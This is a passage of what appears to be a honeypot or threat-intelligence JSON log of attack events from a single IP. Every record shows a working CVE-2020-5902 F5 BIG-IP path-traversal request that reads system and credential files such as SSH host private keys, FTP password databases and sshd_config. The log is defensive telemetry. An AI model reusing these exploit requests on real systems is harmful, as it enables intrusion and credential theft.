  3107. "event_id": "c6cee199964fc00069e8f7c0a8e46543da23b9b8bc17434726b31e255f139323",
  3108. "source_ip_address": "85.248.227.163",
  3109. "country": "SK",
  3110. "user_agent": "python-requests/2.23.0",
  3111. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/opt/lampp/etc/httpd.conf HTTP/1.1",
  3112. "post_data": "",
  3113. "target_port": 443,
  3114. "protocol": "tcp",
  3115. "tags": [
  3116. {
  3117. "cve": "CVE-2020-5902",
  3118. "category": "Platform",
  3119. "description": "F5 BIG-IP Configuration Utility RCE"
  3120. }
  3121. ],
  3122. "event_count": 1,
  3123. "first_seen": "2020-07-09T08:04:01Z",
  3124. "last_seen": "2020-07-09T08:04:01Z"
  3125. },
  3126. {
  3127. "event_id": "b2966e60884cb4f02bb8e62ef23c00581fd4097badadbc897662fdc9fbb870e7",
  3128. "source_ip_address": "85.248.227.163",
  3129. "country": "SK",
  3130. "user_agent": "python-requests/2.23.0",
  3131. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/logs/security_log HTTP/1.1",
  3132. "post_data": "",
  3133. "target_port": 443,
  3134. "protocol": "tcp",
  3135. "tags": [
  3136. {
  3137. "cve": "CVE-2020-5902",
  3138. "category": "Platform",
  3139. "description": "F5 BIG-IP Configuration Utility RCE"
  3140. }
  3141. ],
  3142. "event_count": 1,
  3143. "first_seen": "2020-07-09T08:04:00Z",
  3144. "last_seen": "2020-07-09T08:04:00Z"
  3145. },
  3146. {
  3147. "event_id": "9a5111b4533c4d14658fcb2ef97acabcd9eec8c99f5e2d76dfcc4fb3c75fa3cb",
  3148. "source_ip_address": "85.248.227.163",
  3149. "country": "SK",
  3150. "user_agent": "python-requests/2.23.0",
  3151. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/logs/security_debug_log HTTP/1.1",
  3152. "post_data": "",
  3153. "target_port": 443,
  3154. "protocol": "tcp",
  3155. "tags": [
  3156. {
  3157. "cve": "CVE-2020-5902",
  3158. "category": "Platform",
  3159. "description": "F5 BIG-IP Configuration Utility RCE"
  3160. }
  3161. ],
  3162. "event_count": 1,
  3163. "first_seen": "2020-07-09T08:03:58Z",
  3164. "last_seen": "2020-07-09T08:03:58Z"
  3165. },
  3166. {
  3167. "event_id": "685633a0fd3136dfdb135a93d9d3343afcbea5a6a4daa66f15776ac3664ad8dd",
  3168. "source_ip_address": "85.248.227.163",
  3169. "country": "SK",
  3170. "user_agent": "python-requests/2.23.0",
  3171. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/logs/pure-ftpd.log HTTP/1.1",
  3172. "post_data": "",
  3173. "target_port": 443,
  3174. "protocol": "tcp",
  3175. "tags": [
  3176. {
  3177. "cve": "CVE-2020-5902",
  3178. "category": "Platform",
  3179. "description": "F5 BIG-IP Configuration Utility RCE"
  3180. }
  3181. ],
  3182. "event_count": 1,
  3183. "first_seen": "2020-07-09T08:03:57Z",
  3184. "last_seen": "2020-07-09T08:03:57Z"
  3185. },
  3186. {
  3187. "event_id": "6d071787e76bdccd9c5567d390c00a0de25b56399e00aa33bc9ba54b87efce35",
  3188. "source_ip_address": "85.248.227.163",
  3189. "country": "SK",
  3190. "user_agent": "python-requests/2.23.0",
  3191. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/wu-ftpd/ftpusers HTTP/1.1",
  3192. "post_data": "",
  3193. "target_port": 443,
  3194. "protocol": "tcp",
  3195. "tags": [
  3196. {
  3197. "cve": "CVE-2020-5902",
  3198. "category": "Platform",
  3199. "description": "F5 BIG-IP Configuration Utility RCE"
  3200. }
  3201. ],
  3202. "event_count": 1,
  3203. "first_seen": "2020-07-09T08:03:55Z",
  3204. "last_seen": "2020-07-09T08:03:55Z"
  3205. },
  3206. {
  3207. "event_id": "c09592e30583ee20239c0a64dfe9df61bbc4c25a2b4d4ee3e8c8e3bd193cd672",
  3208. "source_ip_address": "85.248.227.163",
  3209. "country": "SK",
  3210. "user_agent": "python-requests/2.23.0",
  3211. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/wu-ftpd/ftphosts HTTP/1.1",
  3212. "post_data": "",
  3213. "target_port": 443,
  3214. "protocol": "tcp",
  3215. "tags": [
  3216. {
  3217. "cve": "CVE-2020-5902",
  3218. "category": "Platform",
  3219. "description": "F5 BIG-IP Configuration Utility RCE"
  3220. }
  3221. ],
  3222. "event_count": 1,
  3223. "first_seen": "2020-07-09T08:03:54Z",
  3224. "last_seen": "2020-07-09T08:03:54Z"
  3225. },
  3226. {
  3227. "event_id": "086663086d6d2ecb27d41d95e46c8eff5e395a421a53adef4d6f82c9b1866fa0",
  3228. "source_ip_address": "85.248.227.163",
  3229. "country": "SK",
  3230. "user_agent": "python-requests/2.23.0",
  3231. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/wu-ftpd/ftpaccess HTTP/1.1",
  3232. "post_data": "",
  3233. "target_port": 443,
  3234. "protocol": "tcp",
  3235. "tags": [
  3236. {
  3237. "cve": "CVE-2020-5902",
  3238. "category": "Platform",
  3239. "description": "F5 BIG-IP Configuration Utility RCE"
  3240. }
  3241. ],
  3242. "event_count": 1,
  3243. "first_seen": "2020-07-09T08:03:52Z",
  3244. "last_seen": "2020-07-09T08:03:52Z"
  3245. },
  3246. {
  3247. "event_id": "53dcb774c5d882723e22fda17447581ecb31a8f2c698c1bd0b7e976f2f406747",
  3248. "source_ip_address": "85.248.227.163",
  3249. "country": "SK",
  3250. "user_agent": "python-requests/2.23.0",
  3251. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/vsftpd/vsftpd.conf HTTP/1.1",
  3252. "post_data": "",
  3253. "target_port": 443,
  3254. "protocol": "tcp",
  3255. "tags": [
  3256. {
  3257. "cve": "CVE-2020-5902",
  3258. "category": "Platform",
  3259. "description": "F5 BIG-IP Configuration Utility RCE"
  3260. }
  3261. ],
  3262. "event_count": 1,
  3263. "first_seen": "2020-07-09T08:03:51Z",
  3264. "last_seen": "2020-07-09T08:03:51Z"
  3265. },
  3266. {
  3267. "event_id": "67eb316142720b6b76515f07b527a15e4797bd874368026661a519b67628fe9d",
  3268. "source_ip_address": "85.248.227.163",
  3269. "country": "SK",
  3270. "user_agent": "python-requests/2.23.0",
  3271. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/vsftpd.conf HTTP/1.1",
  3272. "post_data": "",
  3273. "target_port": 443,
  3274. "protocol": "tcp",
  3275. "tags": [
  3276. {
  3277. "cve": "CVE-2020-5902",
  3278. "category": "Platform",
  3279. "description": "F5 BIG-IP Configuration Utility RCE"
  3280. }
  3281. ],
  3282. "event_count": 1,
  3283. "first_seen": "2020-07-09T08:03:50Z",
  3284. "last_seen": "2020-07-09T08:03:50Z"
  3285. },
  3286. {
  3287. "event_id": "8b59a5063c96f2133796873a96fb58bc2977fc589590859dd4e33ca082cf6fee",
  3288. "source_ip_address": "85.248.227.163",
  3289. "country": "SK",
  3290. "user_agent": "python-requests/2.23.0",
  3291. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/vsftpd.chroot_list HTTP/1.1",
  3292. "post_data": "",
  3293. "target_port": 443,
  3294. "protocol": "tcp",
  3295. "tags": [
  3296. {
  3297. "cve": "CVE-2020-5902",
  3298. "category": "Platform",
  3299. "description": "F5 BIG-IP Configuration Utility RCE"
  3300. }
  3301. ],
  3302. "event_count": 1,
  3303. "first_seen": "2020-07-09T08:03:48Z",
  3304. "last_seen": "2020-07-09T08:03:48Z"
  3305. },
  3306. {
  3307. "event_id": "f8c06d8f1b91938cb4f8cde8094bb1d1637a17500d6bae56efbcdcf71ceff101",
  3308. "source_ip_address": "85.248.227.163",
  3309. "country": "SK",
  3310. "user_agent": "python-requests/2.23.0",
  3311. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/vhcs2/proftpd/proftpd.conf HTTP/1.1",
  3312. "post_data": "",
  3313. "target_port": 443,
  3314. "protocol": "tcp",
  3315. "tags": [
  3316. {
  3317. "cve": "CVE-2020-5902",
  3318. "category": "Platform",
  3319. "description": "F5 BIG-IP Configuration Utility RCE"
  3320. }
  3321. ],
  3322. "event_count": 1,
  3323. "first_seen": "2020-07-09T08:03:47Z",
  3324. "last_seen": "2020-07-09T08:03:47Z"
  3325. },
  3326. {
  3327. "event_id": "ac25f447591c3a6e7c8091c0480e66c75440f26b2d7f6ed4f61a358ea32f966c",
  3328. "source_ip_address": "85.248.227.163",
  3329. "country": "SK",
  3330. "user_agent": "python-requests/2.23.0",
  3331. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/termcap HTTP/1.1",
  3332. "post_data": "",
  3333. "target_port": 443,
  3334. "protocol": "tcp",
  3335. "tags": [
  3336. {
  3337. "cve": "CVE-2020-5902",
  3338. "category": "Platform",
  3339. "description": "F5 BIG-IP Configuration Utility RCE"
  3340. }
  3341. ],
  3342. "event_count": 1,
  3343. "first_seen": "2020-07-09T08:03:45Z",
  3344. "last_seen": "2020-07-09T08:03:45Z"
  3345. },
  3346. {
  3347. "event_id": "f9181b292b9d1d8f75033a8a84f480a90010eb6e38261d3ef445d2f9e3260950",
  3348. "source_ip_address": "85.248.227.163",
  3349. "country": "SK",
  3350. "user_agent": "python-requests/2.23.0",
  3351. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/syslog.conf HTTP/1.1",
  3352. "post_data": "",
  3353. "target_port": 443,
  3354. "protocol": "tcp",
  3355. "tags": [
  3356. {
  3357. "cve": "CVE-2020-5902",
  3358. "category": "Platform",
  3359. "description": "F5 BIG-IP Configuration Utility RCE"
  3360. }
  3361. ],
  3362. "event_count": 1,
  3363. "first_seen": "2020-07-09T08:03:44Z",
  3364. "last_seen": "2020-07-09T08:03:44Z"
  3365. },
  3366. {
  3367. "event_id": "8a8882f6ce6c7ecc0dbb2970ce02c962b8ddccce531255b79f9e5dd12e8c8829",
  3368. "source_ip_address": "85.248.227.163",
  3369. "country": "SK",
  3370. "user_agent": "python-requests/2.23.0",
  3371. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/sysconfig/network HTTP/1.1",
  3372. "post_data": "",
  3373. "target_port": 443,
  3374. "protocol": "tcp",
  3375. "tags": [
  3376. {
  3377. "cve": "CVE-2020-5902",
  3378. "category": "Platform",
  3379. "description": "F5 BIG-IP Configuration Utility RCE"
  3380. }
  3381. ],
  3382. "event_count": 1,
  3383. "first_seen": "2020-07-09T08:03:42Z",
  3384. "last_seen": "2020-07-09T08:03:42Z"
  3385. },
  3386. {
  3387. "event_id": "d8bd823ae0f87ba8896192ce68759db0af0ed462b1e18e5169ea86f0c79e0290",
  3388. "source_ip_address": "85.248.227.163",
  3389. "country": "SK",
  3390. "user_agent": "python-requests/2.23.0",
  3391. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/ssh_host_key.pub HTTP/1.1",
  3392. "post_data": "",
  3393. "target_port": 443,
  3394. "protocol": "tcp",
  3395. "tags": [
  3396. {
  3397. "cve": "CVE-2020-5902",
  3398. "category": "Platform",
  3399. "description": "F5 BIG-IP Configuration Utility RCE"
  3400. }
  3401. ],
  3402. "event_count": 1,
  3403. "first_seen": "2020-07-09T08:03:41Z",
  3404. "last_seen": "2020-07-09T08:03:41Z"
  3405. },
  3406. {
  3407. "event_id": "c66fd426fe8e1fbbc6d0c200251968cf19d1a38115be9c4abccc5e24721027ce",
  3408. "source_ip_address": "85.248.227.163",
  3409. "country": "SK",
  3410. "user_agent": "python-requests/2.23.0",
  3411. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/ssh_host_key HTTP/1.1",
  3412. "post_data": "",
  3413. "target_port": 443,
  3414. "protocol": "tcp",
  3415. "tags": [
  3416. {
  3417. "cve": "CVE-2020-5902",
  3418. "category": "Platform",
  3419. "description": "F5 BIG-IP Configuration Utility RCE"
  3420. }
  3421. ],
  3422. "event_count": 1,
  3423. "first_seen": "2020-07-09T08:03:39Z",
  3424. "last_seen": "2020-07-09T08:03:39Z"
  3425. },
  3426. {
  3427. "event_id": "c9abfc000dce4fe0ac0c86d8bb1ae663f6526ff81b9c90dd68bac0fff7757f0c",
  3428. "source_ip_address": "85.248.227.163",
  3429. "country": "SK",
  3430. "user_agent": "python-requests/2.23.0",
  3431. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/ssh_host_dsa_key.pub HTTP/1.1",
  3432. "post_data": "",
  3433. "target_port": 443,
  3434. "protocol": "tcp",
  3435. "tags": [
  3436. {
  3437. "cve": "CVE-2020-5902",
  3438. "category": "Platform",
  3439. "description": "F5 BIG-IP Configuration Utility RCE"
  3440. }
  3441. ],
  3442. "event_count": 1,
  3443. "first_seen": "2020-07-09T08:03:38Z",
  3444. "last_seen": "2020-07-09T08:03:38Z"
  3445. },
  3446. {
  3447. "event_id": "9f5ff5be3e58bc9bedca65b2c3465261d75d822cbfc967647e0b0738ded73b50",
  3448. "source_ip_address": "85.248.227.163",
  3449. "country": "SK",
  3450. "user_agent": "python-requests/2.23.0",
  3451. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/ssh_host_dsa_key HTTP/1.1",
  3452. "post_data": "",
  3453. "target_port": 443,
  3454. "protocol": "tcp",
  3455. "tags": [
  3456. {
  3457. "cve": "CVE-2020-5902",
  3458. "category": "Platform",
  3459. "description": "F5 BIG-IP Configuration Utility RCE"
  3460. }
  3461. ],
  3462. "event_count": 1,
  3463. "first_seen": "2020-07-09T08:03:36Z",
  3464. "last_seen": "2020-07-09T08:03:36Z"
  3465. },
  3466. {
  3467. "event_id": "0a8bb510c3fbb3f0d1235c869454a408e5d30117d11cd6363d64b6cb371b83f8",
  3468. "source_ip_address": "85.248.227.163",
  3469. "country": "SK",
  3470. "user_agent": "python-requests/2.23.0",
  3471. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/sshd_config HTTP/1.1",
  3472. "post_data": "",
  3473. "target_port": 443,
  3474. "protocol": "tcp",
  3475. "tags": [
  3476. {
  3477. "cve": "CVE-2020-5902",
  3478. "category": "Platform",
  3479. "description": "F5 BIG-IP Configuration Utility RCE"
  3480. }
  3481. ],
  3482. "event_count": 1,
  3483. "first_seen": "2020-07-09T08:03:35Z",
  3484. "last_seen": "2020-07-09T08:03:35Z"
  3485. },
  3486. {
  3487. "event_id": "f6d4d44b702e69d750039a4997cff5fddd2e4094af137c52ffd468de05d4c5a9",
  3488. "source_ip_address": "85.248.227.163",
  3489. "country": "SK",
  3490. "user_agent": "python-requests/2.23.0",
  3491. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/ssh_config HTTP/1.1",
  3492. "post_data": "",
  3493. "target_port": 443,
  3494. "protocol": "tcp",
  3495. "tags": [
  3496. {
  3497. "cve": "CVE-2020-5902",
  3498. "category": "Platform",
  3499. "description": "F5 BIG-IP Configuration Utility RCE"
  3500. }
  3501. ],
  3502. "event_count": 1,
  3503. "first_seen": "2020-07-09T08:03:33Z",
  3504. "last_seen": "2020-07-09T08:03:33Z"
  3505. },
  3506. {
  3507. "event_id": "01d7f38c325091571decaf7f9684199d09008ae63e793e31c33faea38a1d999d",
  3508. "source_ip_address": "85.248.227.163",
  3509. "country": "SK",
  3510. "user_agent": "python-requests/2.23.0",
  3511. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/snmpd.conf HTTP/1.1",
  3512. "post_data": "",
  3513. "target_port": 443,
  3514. "protocol": "tcp",
  3515. "tags": [
  3516. {
  3517. "cve": "CVE-2020-5902",
  3518. "category": "Platform",
  3519. "description": "F5 BIG-IP Configuration Utility RCE"
  3520. }
  3521. ],
  3522. "event_count": 1,
  3523. "first_seen": "2020-07-09T08:03:32Z",
  3524. "last_seen": "2020-07-09T08:03:32Z"
  3525. },
  3526. {
  3527. "event_id": "d8ad4782b8ed12541250db9a77838c526fc7562307427e36221145296e376986",
  3528. "source_ip_address": "85.248.227.163",
  3529. "country": "SK",
  3530. "user_agent": "python-requests/2.23.0",
  3531. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/samba/smb.conf HTTP/1.1",
  3532. "post_data": "",
  3533. "target_port": 443,
  3534. "protocol": "tcp",
  3535. "tags": [
  3536. {
  3537. "cve": "CVE-2020-5902",
  3538. "category": "Platform",
  3539. "description": "F5 BIG-IP Configuration Utility RCE"
  3540. }
  3541. ],
  3542. "event_count": 1,
  3543. "first_seen": "2020-07-09T08:03:31Z",
  3544. "last_seen": "2020-07-09T08:03:31Z"
  3545. },
  3546. {
  3547. "event_id": "db033e859264eb9b59524662cbd68af4bb12d4841239cbc119e7cb76e64f99af",
  3548. "source_ip_address": "85.248.227.163",
  3549. "country": "SK",
  3550. "user_agent": "python-requests/2.23.0",
  3551. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/resolv.conf HTTP/1.1",
  3552. "post_data": "",
  3553. "target_port": 443,
  3554. "protocol": "tcp",
  3555. "tags": [
  3556. {
  3557. "cve": "CVE-2020-5902",
  3558. "category": "Platform",
  3559. "description": "F5 BIG-IP Configuration Utility RCE"
  3560. }
  3561. ],
  3562. "event_count": 1,
  3563. "first_seen": "2020-07-09T08:03:29Z",
  3564. "last_seen": "2020-07-09T08:03:29Z"
  3565. },
  3566. {
  3567. "event_id": "2de644597c834b9f663255379ee7cc8b9ab14fd797197211c1f041133aa54f90",
  3568. "source_ip_address": "85.248.227.163",
  3569. "country": "SK",
  3570. "user_agent": "python-requests/2.23.0",
  3571. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/redhat-release HTTP/1.1",
  3572. "post_data": "",
  3573. "target_port": 443,
  3574. "protocol": "tcp",
  3575. "tags": [
  3576. {
  3577. "cve": "CVE-2020-5902",
  3578. "category": "Platform",
  3579. "description": "F5 BIG-IP Configuration Utility RCE"
  3580. }
  3581. ],
  3582. "event_count": 1,
  3583. "first_seen": "2020-07-09T08:03:28Z",
  3584. "last_seen": "2020-07-09T08:03:28Z"
  3585. },
  3586. {
  3587. "event_id": "9a13c0de7f3fae73baf0f0407f7b1fd8ec1f6da061956efbedc72a24b2ff9d43",
  3588. "source_ip_address": "85.248.227.163",
  3589. "country": "SK",
  3590. "user_agent": "python-requests/2.23.0",
  3591. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/pure-ftpd/putreftpd.pdb HTTP/1.1",
  3592. "post_data": "",
  3593. "target_port": 443,
  3594. "protocol": "tcp",
  3595. "tags": [
  3596. {
  3597. "cve": "CVE-2020-5902",
  3598. "category": "Platform",
  3599. "description": "F5 BIG-IP Configuration Utility RCE"
  3600. }
  3601. ],
  3602. "event_count": 1,
  3603. "first_seen": "2020-07-09T08:03:26Z",
  3604. "last_seen": "2020-07-09T08:03:26Z"
  3605. },
  3606. {
  3607. "event_id": "c5b1d77e7998a8eed274238fe02938bad03bfb3ca395cedb1345f59ea3804e79",
  3608. "source_ip_address": "85.248.227.163",
  3609. "country": "SK",
  3610. "user_agent": "python-requests/2.23.0",
  3611. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/pure-ftpd/pure-ftpd.pdb HTTP/1.1",
  3612. "post_data": "",
  3613. "target_port": 443,
  3614. "protocol": "tcp",
  3615. "tags": [
  3616. {
  3617. "cve": "CVE-2020-5902",
  3618. "category": "Platform",
  3619. "description": "F5 BIG-IP Configuration Utility RCE"
  3620. }
  3621. ],
  3622. "event_count": 1,
  3623. "first_seen": "2020-07-09T08:03:25Z",
  3624. "last_seen": "2020-07-09T08:03:25Z"
  3625. },
  3626. {
  3627. "event_id": "659bd9bb6559db76c2749604e06226172c6c24e1ccac9f7f316da988073c4586",
  3628. "source_ip_address": "85.248.227.163",
  3629. "country": "SK",
  3630. "user_agent": "python-requests/2.23.0",
  3631. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/pure-ftpd/pure-ftpd.conf HTTP/1.1",
  3632. "post_data": "",
  3633. "target_port": 443,
  3634. "protocol": "tcp",
  3635. "tags": [
  3636. {
  3637. "cve": "CVE-2020-5902",
  3638. "category": "Platform",
  3639. "description": "F5 BIG-IP Configuration Utility RCE"
  3640. }
  3641. ],
  3642. "event_count": 1,
  3643. "first_seen": "2020-07-09T08:03:23Z",
  3644. "last_seen": "2020-07-09T08:03:23Z"
  3645. }
  3646. ]
  3647. }